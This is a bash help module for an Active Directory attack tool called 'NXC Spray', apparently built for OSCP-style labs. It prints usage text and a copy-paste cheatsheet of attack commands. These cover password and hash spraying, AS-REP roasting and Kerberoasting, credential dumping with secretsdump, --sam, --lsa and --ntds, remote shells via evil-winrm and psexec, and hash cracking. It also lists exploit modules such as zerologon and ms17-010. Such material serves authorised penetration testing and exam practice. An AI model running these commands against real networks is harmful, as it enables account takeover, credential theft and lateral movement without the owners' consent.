#!/bin/bash
# MODULE: help.sh - --help and --cheatsheet handlers

[[ "${1:-}" == "-h" || "${1:-}" == "--help" ]] && {
    echo -e "${CYAN}╔═══════════════════════════════════════════════════════════╗"
    echo    "║                        NXC Spray                          ║"
    echo    "║                  Created by 1337.codes                    ║"
    echo -e "╚═══════════════════════════════════════════════════════════╝${NC}"
    echo ""
    echo "Usage: $0 [options]"
    echo ""
    echo -e "${YELLOW}── TARGET / CREDENTIAL OPTIONS ────────────────────────────────${NC}"
    echo "  -T <target>         Single target IP/hostname/CIDR OR file path"
    echo "                      (overrides targets.txt)"
    echo "  -U <username>       Single username OR file path (overrides users.txt)"
    echo "  -P <password>       Single password OR file path (overrides passwords.txt)"
    echo "  -H <hash>           Single NT hash OR file path (overrides hashes.txt)"
    echo "  -D <domain>         Domain name (overrides domain.txt)"
    echo "  -dc, --dc <ip>      Force Domain Controller IP for Kerberos/LDAP/impacket."
    echo "                      Use when auto-detection picks the wrong DC, or DNS does"
    echo "                      not resolve the FQDN.  Example:  -dc 10.10.10.1"
    echo "  -c <u:p|file>       Credential pair user:pass OR file (one u:p per line)"
    echo "  -ch <u:h|file>      Credential pair user:NT-hash OR file (one u:h per line)"
    echo ""
    echo -e "${YELLOW}── MODE FLAGS ──────────────────────────────────────────────────${NC}"
    echo "  -g, --generate      Generate username variations from full names in users file"
    echo "                      e.g. 'John Smith' -> jsmith, j.smith, smithj, john.smith"
    echo "  --generateonly      Only generate/export usernames (no scanning), then exit"
    echo "                      Output: OUTDIR/users_all_formats.txt + ./generatedusers.txt"
    echo "  -f, --fast          Fast mode — keeps spraying, skips everything slow:"
    echo "                        SKIPS: kerbrute, anon/null/guest enum, RID brute,"
    echo "                               windapsearch, GetADUsers, nsr spray,"
    echo "                               SID/lookupsid discovery, user descriptions,"
    echo "                               extras/vuln NXC modules"
    echo "                        KEEPS: port scan, protocol spray (smb/winrm/rdp/ssh/"
    echo "                               ftp/ldap/mssql/wmi/mysql), AS-REP, Kerberoast,"
    echo "                               certipy ADCS scan, SMB share enum,"
    echo "                               authenticated LDAP dump, BloodHound hints"
    echo "  -s, --standalone    Standalone mode — for non-AD targets"
    echo "                        SKIPS: kerbrute, AS-REP, Kerberoast, LDAP enum,"
    echo "                               domain auto-detection, impacket AD tools,"
    echo "                               certipy, delegation checks"
    echo "                        KEEPS: SMB/WinRM/SSH/FTP spray, share enum, all"
    echo "                               credential tests, SSH post-auth enum"
    echo "  --ldap              LDAP-dump only — Phase 4.2 dump then exit"
    echo "                      Requires creds (-U/-P/-H or files)"
    echo "  --smb-only          Only SMB port check + spray + share enum"
    echo ""
    echo -e "${YELLOW}── SCAN CONTROL ────────────────────────────────────────────────${NC}"
    echo "  --no-cache          Force port rescan (ignore .nxc_ports_cache)"
    echo "  --anonymous-scan    Force anon/RID/LDAP pre-enum even when creds provided"
    echo "                      Compatible with -f: slow modules still skip"
    echo "  --skip-domain-sids  Skip impacket-lookupsid -domain-sids (can stall)"
    echo "  --skip-desc-users   Skip LDAP get-desc-users + SID discovery (lookupsid)"
    echo "  --no-share-enum     Disable SMB share enumeration"
    echo "  --resume <phase>    Resume from a specific phase number (0-8) or name"
    echo "                      0=ports    1=usergen   2=spray    3=shares"
    echo "                      4=asrep_kerb  5=userenum  6=mail  7=adattacks  8=slow"
    echo "  -w, --workers <n>   Thread count for nxc/kerbrute/hydra (default: 20)"
    echo ""
    echo -e "${YELLOW}── ADVANCED / VULN MODULES ─────────────────────────────────────${NC}"
    echo "  --extras-only       Run only slow/vuln modules (best run later when you"
    echo "                      have time, while you enumerate manually in parallel)"
    echo "                      SMB:  ms17-010, smbghost, zerologon, nopac, pre2k,"
    echo "                            spooler, webdav, veeam, reg-winlogon,"
    echo "                            petitpotam*, coerce_plus*  (*skipped in --oscp)"
    echo "                      MSSQL: mssql_priv, linked servers, xp_cmdshell status"
    echo "                      LDAP: ldap-checker, gmsa, find-delegation,"
    echo "                            trusted-for-delegation, password-not-required,"
    echo "                            admin-count, adcs, laps"
    echo ""
    echo -e "${YELLOW}── OSCP / EXAM MODE ────────────────────────────────────────────${NC}"
    echo "  --oscp              OSCP exam mode (DEFAULT: on)"
    echo "                        SKIPPED: -M petitpotam, -M coerce_plus"
    echo "                        ALLOWED: all enumeration + spraying, AS-REP,"
    echo "                                 Kerberoasting, certipy-ad find, LDAP dump,"
    echo "                                 BloodHound, secretsdump/--sam/--lsa"
    echo "                                 (only after confirmed Pwn3d!), mysql/"
    echo "                                 mssql/postgres/redis default cred checks"
    echo ""
    echo -e "${YELLOW}── CUSTOM PORT OPTIONS ─────────────────────────────────────────${NC}"
    echo "  --smb-port <port>   SMB port   (default: 445)"
    echo "  --ftp-port <port>   FTP port   (default: 21)"
    echo "  --ssh-port <port>   SSH port   (default: 22)"
    echo "  --mssql-port <port> MSSQL port (default: 1433)"
    echo "  --winrm-port <port> WinRM port (default: 5985)"
    echo ""
    echo -e "${YELLOW}── MISC ────────────────────────────────────────────────────────${NC}"
    echo "  -C, --cheatsheet    Print full manual command reference (copy-paste sheet)"
    echo "  --adcs-help [ESC#]  Show ADCS ESC reference + certipy copy-paste commands"
    echo "                      Examples:  --adcs-help ESC1  |  --adcs-help all"
    echo "  -h, --help          Show this help"
    echo ""
    echo -e "${YELLOW}── AUTO-DETECTED FILES (place in CWD) ──────────────────────────${NC}"
    echo "  targets.txt     One IP/CIDR per line     (required unless -T used)"
    echo "  users.txt       One username per line"
    echo "  passwords.txt   One password per line"
    echo "  hashes.txt      NT hash OR LM:NT per line"
    echo "  domain.txt      Domain FQDN (single line)"
    echo ""
    echo -e "${YELLOW}── SCANNED PROTOCOLS ───────────────────────────────────────────${NC}"
    echo "  Sprayed via nxc:  smb(445) winrm(5985) rdp(3389) ssh(22) ftp(21)"
    echo "                    ldap(389/636) mssql(1433) wmi(135) mysql(3306)"
    echo "  Scan + hints:     http(80) https(443) postgres(5432) redis(6379)"
    echo "                    oracle(1521) smtp(25) pop3(110) imap(143)"
    echo "                    vnc(5900) nfs(2049)"
    echo "  DB default cred checks (OSCP-safe, always run when port open):"
    echo "    mysql    — nxc mysql / direct mysql client (blank + common creds)"
    echo "    mssql    — Windows auth + SQL auth (--local-auth sa account)"
    echo "    postgres — psql direct blank-password check"
    echo "    redis    — unauthenticated access + common password brute"
    echo ""
    echo -e "${YELLOW}── EXECUTION PHASES ────────────────────────────────────────────${NC}"
    echo "  0  Port scan — probe all targets, build per-protocol target files"
    echo "  1  Username prep — load users, optionally generate format variations (-g)"
    echo "  2  Kerbrute — find valid AD usernames before spraying"
    echo "     [skipped: -f | -s | creds already provided]"
    echo "  3  Anonymous enum — null/guest sessions, RID brute, pass-pol"
    echo "     [skipped: -f | creds provided (unless --anonymous-scan)]"
    echo "  4  LDAP user enum — windapsearch, impacket-GetADUsers, ldapsearch dump"
    echo "     [skipped: -f | -s | creds provided]"
    echo "  4.2 Full LDAP dump — ldapsearch authenticated domain dump"
    echo "  4.5 Mail enum — SMTP user enum, POP3/IMAP open hints"
    echo "  5  NSR spray — null/same/reverse password via nxc + hydra hints"
    echo "     [skipped: creds already provided]"
    echo "  6  Credential spray — all protocols + DB default credential checks"
    echo "  6B SMB enum — share listing, auto-browsing, gpp_password, gpp_autologin,"
    echo "                spider (slow — runs in extras), gen-relay-list"
    echo "  6C SSH enum — banner grab, OS detection, default creds, post-auth enum"
    echo "  7  AD attacks — AS-REP roast, Kerberoasting, certipy ADCS scan,"
    echo "     get-desc-users (password hunting), lookupsid, delegation enum,"
    echo "     BloodHound collection hints, enum4linux-ng, ldapdomaindump"
    echo "     [skipped: -s]"
    echo "  8  Slow/extras — ms17-010, smbghost, zerologon, nopac, pre2k, spooler,"
    echo "     webdav, veeam, reg-winlogon, petitpotam*, coerce_plus*,"
    echo "     ldap-checker, gmsa, laps, adcs, find-delegation"
    echo "     [skipped: -f  |  run standalone: --extras-only]"
    echo ""
    echo -e "${YELLOW}── EXAMPLES ────────────────────────────────────────────────────${NC}"
    echo "  # Full scan, single target, auto-detect domain"
    echo "  $0 -T 10.10.10.1 -U administrator -P 'Password123!'"
    echo ""
    echo "  # Wrong DC auto-detected — force it"
    echo "  $0 -T 10.10.10.0/24 -dc 10.10.10.1 -D corp.local"
    echo ""
    echo "  # Hash spray, skip slow enum"
    echo "  $0 -T 10.10.10.1 -U administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0' -f"
    echo ""
    echo "  # Combo pairs file (user:pass per line)"
    echo "  $0 -T 10.10.10.1 -c confirmed_creds.txt"
    echo ""
    echo "  # Generate username variations then spray"
    echo "  $0 -T 10.10.10.1 -g"
    echo ""
    echo "  # Resume from shares phase"
    echo "  $0 -T 10.10.10.1 -U jsmith -P 'Summer2024!' --resume 3"
    echo ""
    echo "  # Custom ports"
    echo "  $0 -T 10.10.10.1 --smb-port 4445 --ssh-port 2222"
    echo ""
    echo "  # LDAP dump only"
    echo "  $0 -T 10.10.10.1 -U jsmith -P 'Summer2024!' --ldap"
    echo ""
    echo "  # Anonymous scan only (discover users, no creds)"
    echo "  $0 -T 10.10.10.1 -D corp.local"
    echo ""
    echo -e "${YELLOW}── QUICK START ─────────────────────────────────────────────────${NC}"
    echo "  echo '10.10.10.1' > targets.txt"
    echo "  echo 'corp.local' > domain.txt"
    echo "  echo 'administrator' > users.txt"
    echo "  echo 'Password123!' > passwords.txt"
    echo "  bash $0"
    exit 0
}

# ── Cheatsheet / manual reference ────────────────────────────────────────────
[[ "${1:-}" == "-C" || "${1:-}" == "--cheatsheet" || "${1:-}" == "--handleiding" ]] && {
    TARGETS="${TARGETS:-targets.txt}"
    USERS="${USERS:-users.txt}"
    PASSWORDS="${PASSWORDS:-passwords.txt}"
    [[ -f "domain.txt" ]] && DOMAIN="${DOMAIN:-$(cat domain.txt | tr -d '\n\r')}"
    TARGET_IP=$(head -1 "$TARGETS" 2>/dev/null || echo "TARGET_IP")

    echo -e "${CYAN}╔═══════════════════════════════════════════════════════════╗"
    echo    "║  MANUAL ENUMERATION CHEATSHEET                            ║"
    echo -e "╚═══════════════════════════════════════════════════════════╝${NC}"
    echo ""
    echo -e "${YELLOW}=== INPUT FILE FORMATS ===${NC}"
    echo "targets.txt   - One IP/CIDR per line:  10.10.10.1"
    echo "users.txt     - One username per line:  administrator"
    echo "passwords.txt - One password per line:  Welcome1!"
    echo "hashes.txt    - NT hash OR LM:NT:       9307ee5abf7791f3424d9d5148b20177"
    echo "domain.txt    - Domain name:            CORP.LOCAL"
    echo ""
    echo -e "${YELLOW}=== STEP 1: USERNAME GENERATION ===${NC}"
    echo "bash $0 -T $TARGET_IP -g --generateonly   # export only, no scan"
    echo "# Generates: jsmith, j.smith, smithj, john.smith, smithjohn, etc."
    echo ""
    echo -e "${YELLOW}=== STEP 2: KERBRUTE USER VALIDATION ===${NC}"
    echo "kerbrute userenum -d $DOMAIN --dc $TARGET_IP users.txt"
    echo "kerbrute userenum -d $DOMAIN --dc $TARGET_IP users.txt --downgrade"
    echo ""
    echo -e "${YELLOW}=== STEP 3: LDAP ENUMERATION (Anonymous) ===${NC}"
    echo "ldapsearch -x -H ldap://$TARGET_IP -b 'DC=${DOMAIN%%.*},DC=${DOMAIN#*.}' '(objectClass=user)' sAMAccountName"
    echo "windapsearch.py -d $DOMAIN --dc-ip $TARGET_IP -U"
    echo "windapsearch.py -d $DOMAIN --dc-ip $TARGET_IP --da"
    echo "impacket-GetADUsers $DOMAIN/ -dc-ip $TARGET_IP -all"
    echo ""
    echo -e "${YELLOW}=== STEP 4: AS-REP ROASTING ===${NC}"
    echo "impacket-GetNPUsers $DOMAIN/ -usersfile users.txt -dc-ip $TARGET_IP -format hashcat -outputfile asrep.txt"
    echo "impacket-GetNPUsers $DOMAIN/ -dc-ip $TARGET_IP -request -format hashcat"
    echo "nxc ldap $TARGET_IP -u users.txt -p '' --asreproast asrep.txt"
    echo ""
    echo -e "${YELLOW}=== STEP 5: PASSWORD SPRAYING ===${NC}"
    echo "nxc smb $TARGET_IP -u users.txt -p passwords.txt --continue-on-success"
    echo "nxc smb $TARGET_IP -u users.txt -H hashes.txt --continue-on-success"
    echo "nxc smb $TARGET_IP -u users.txt -p passwords.txt --local-auth --continue-on-success"
    echo "nxc winrm $TARGET_IP -u users.txt -p passwords.txt --continue-on-success"
    echo "nxc ldap $TARGET_IP -u users.txt -p passwords.txt --continue-on-success"
    echo "nxc mssql $TARGET_IP -u users.txt -p passwords.txt --continue-on-success"
    echo "nxc wmi $TARGET_IP -u users.txt -p passwords.txt --continue-on-success"
    echo "nxc ssh $TARGET_IP -u users.txt -p passwords.txt --continue-on-success"
    echo "# NSR (null / same / reverse password):"
    echo "nxc smb $TARGET_IP -u users.txt -p users.txt --no-bruteforce --continue-on-success"
    echo ""
    echo -e "${YELLOW}=== STEP 6: COMBO PAIRS (-c / -ch) ===${NC}"
    echo "# Single pair:"
    echo "bash $0 -T $TARGET_IP -c 'jsmith:Summer2024!'"
    echo "bash $0 -T $TARGET_IP -ch 'jsmith:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'"
    echo "# File (one u:p per line):"
    echo "bash $0 -T $TARGET_IP -c confirmed.txt"
    echo "while IFS=: read -r u p; do nxc smb targets.txt -u \"\$u\" -p \"\$p\" --continue-on-success; done < confirmed.txt"
    echo ""
    echo -e "${YELLOW}=== STEP 7: AUTHENTICATED ENUMERATION ===${NC}"
    echo "nxc smb $TARGET_IP -u USER -p PASS --shares"
    echo "nxc smb $TARGET_IP -u USER -p PASS --users"
    echo "nxc smb $TARGET_IP -u USER -p PASS --groups"
    echo "nxc smb $TARGET_IP -u USER -p PASS --loggedon-users"
    echo "nxc smb $TARGET_IP -u USER -p PASS -M gpp_password"
    echo "nxc smb $TARGET_IP -u USER -p PASS -M gpp_autologin"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --users"
    echo "nxc ldap $TARGET_IP -u USER -p PASS -M get-desc-users"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --kerberoasting kerberoast.txt"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --asreproast asrep.txt"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --get-sid"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --password-not-required"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --admin-count"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --find-delegation"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --trusted-for-delegation"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --gmsa"
    echo "nxc ldap $TARGET_IP -u USER -p PASS -M pre2k"
    echo "nxc ldap $TARGET_IP -u USER -p PASS -M laps"
    echo "nxc ldap $TARGET_IP -u USER -p PASS -M adcs"
    echo "nxc ldap $TARGET_IP -u USER -p PASS -M ldap-checker"
    echo "ldapdomaindump $TARGET_IP -u 'DOMAIN\\USER' -p PASS -o ./ldapdump/"
    echo ""
    echo -e "${YELLOW}=== STEP 8: KERBEROASTING ===${NC}"
    echo "impacket-GetUserSPNs $DOMAIN/USER:PASS -dc-ip $TARGET_IP -request -outputfile kerberoast.txt"
    echo "impacket-GetUserSPNs $DOMAIN/USER -hashes ':NTHASH' -dc-ip $TARGET_IP -request -outputfile kerberoast.txt"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --kerberoasting kerberoast.txt"
    echo ""
    echo -e "${YELLOW}=== STEP 9: ADCS / CERTIPY ===${NC}"
    echo "certipy-ad find -u 'USER@$DOMAIN' -p PASS -dc-ip $TARGET_IP -vulnerable -enabled -stdout"
    echo "certipy-ad find -u 'USER@$DOMAIN' -hashes ':NTHASH' -dc-ip $TARGET_IP -vulnerable -enabled -stdout"
    echo "# After finding an ESC: bash $0 --adcs-help ESC1"
    echo ""
    echo -e "${YELLOW}=== STEP 10: CREDENTIAL DUMPING (Pwn3d! required) ===${NC}"
    echo "nxc smb $TARGET_IP -u USER -p PASS --sam"
    echo "nxc smb $TARGET_IP -u USER -p PASS --lsa"
    echo "nxc smb $TARGET_IP -u USER -p PASS --ntds          # DC only"
    echo "nxc smb $TARGET_IP -u USER -p PASS --dpapi"
    echo "nxc smb $TARGET_IP -u USER -p PASS -M lsassy"
    echo "impacket-secretsdump '$DOMAIN/USER:PASS@$TARGET_IP'"
    echo "impacket-secretsdump -hashes ':NTHASH' 'USER@$TARGET_IP'"
    echo ""
    echo -e "${YELLOW}=== STEP 11: SHELL ACCESS ===${NC}"
    echo "evil-winrm -i $TARGET_IP -u USER -p 'PASS'"
    echo "evil-winrm -i $TARGET_IP -u USER -H 'NTHASH'"
    echo "impacket-psexec '$DOMAIN/USER:PASS@$TARGET_IP'"
    echo "impacket-psexec -hashes ':NTHASH' 'USER@$TARGET_IP'"
    echo "impacket-wmiexec '$DOMAIN/USER:PASS@$TARGET_IP'"
    echo "impacket-smbexec '$DOMAIN/USER:PASS@$TARGET_IP'"
    echo "xfreerdp3 /u:'USER' /p:'PASS' /v:$TARGET_IP /dynamic-resolution /cert:ignore"
    echo "sshpass -p 'PASS' ssh -o StrictHostKeyChecking=no 'USER@$TARGET_IP'"
    echo ""
    echo -e "${YELLOW}=== STEP 12: BLOODHOUND ===${NC}"
    echo "bloodhound-ce-python -d $DOMAIN -u USER -p PASS -ns $TARGET_IP --dns-tcp -c All --zip"
    echo "nxc ldap $TARGET_IP -u USER -p PASS --bloodhound -c All --dns-tcp"
    echo ""
    echo -e "${YELLOW}=== HASH CRACKING ===${NC}"
    echo "# AS-REP RC4 (mode 18200 — FASTEST)"
    echo "hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule"
    echo "john asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt"
    echo ""
    echo "# Kerberoast (mode 13100)"
    echo "hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt"
    echo "john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt"
    echo ""
    echo -e "${YELLOW}=== EXTRAS / VULN MODULES (--extras-only) ===${NC}"
    echo "nxc smb targets.txt -u USER -p PASS -M ms17-010"
    echo "nxc smb targets.txt -u USER -p PASS -M smbghost"
    echo "nxc smb targets.txt -u USER -p PASS -M zerologon"
    echo "nxc smb targets.txt -u USER -p PASS -M nopac"
    echo "nxc smb targets.txt -u USER -p PASS -M pre2k"
    echo "nxc smb targets.txt -u USER -p PASS -M spooler"
    echo "nxc smb targets.txt -u USER -p PASS -M webdav"
    echo "nxc smb targets.txt -u USER -p PASS -M veeam"
    echo "nxc smb targets.txt -u USER -p PASS -M reg-winlogon"
    echo "nxc smb targets.txt -u USER -p PASS -M petitpotam    # OSCP: run manually only"
    echo "nxc smb targets.txt -u USER -p PASS -M coerce_plus   # OSCP: run manually only"
    echo "nxc mssql targets.txt -u USER -p PASS -M mssql_priv"
    echo "nxc ldap targets.txt -u USER -p PASS -M ldap-checker"
    echo "nxc ldap targets.txt -u USER -p PASS -M laps"
    echo "nxc ldap targets.txt -u USER -p PASS -M adcs"
    echo "nxc ldap targets.txt -u USER -p PASS --gmsa"
    echo "nxc ldap targets.txt -u USER -p PASS --find-delegation"
    echo "impacket-findDelegation '$DOMAIN/USER:PASS' -dc-ip '$TARGET_IP'"
    echo ""
    echo -e "${YELLOW}=== DC TROUBLESHOOTING ===${NC}"
    echo "# Wrong DC auto-detected or FQDN not resolving?"
    echo "bash $0 -T 10.10.10.0/24 -dc 10.10.10.1 -D corp.local"
    echo ""
    echo -e "${YELLOW}=== SMB SHARE BROWSING ===${NC}"
    echo "impacket-smbclient 'DOMAIN/USER:PASS@TARGET' -c 'shares'"
    echo "impacket-smbclient 'DOMAIN/USER:PASS@TARGET' -c 'use SHARE; ls'"
    echo "impacket-smbclient 'DOMAIN/USER:PASS@TARGET' -c 'use SHARE; tree'"
    echo "impacket-smbclient 'DOMAIN/USER:PASS@TARGET' -c 'use SHARE; get FILE'"
    echo "impacket-smbclient -hashes ':NTHASH' 'DOMAIN/USER@TARGET'"
    exit 0
}
